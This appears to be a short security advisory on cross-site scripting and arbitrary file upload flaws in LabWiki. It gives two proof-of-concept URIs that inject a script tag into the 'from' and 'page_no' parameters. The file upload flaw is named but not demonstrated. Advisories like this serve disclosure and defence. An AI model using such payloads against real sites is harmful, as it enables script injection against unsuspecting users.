LabWiki Multiple Cross Site Scripting And Arbitrary File Upload Vulnerabilities

LabWiki Multiple Cross Site Scripting And Arbitrary File Upload Vulnerabilities

Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/LabWiki/index.php?from=";></><script>alert('muuratsalo')</script>&help=true&page=What_is_wiki
http://www.example.com/LabWiki/recentchanges.php?nothing=nothing&page_no=";></><script>alert('muuratsalo')</script>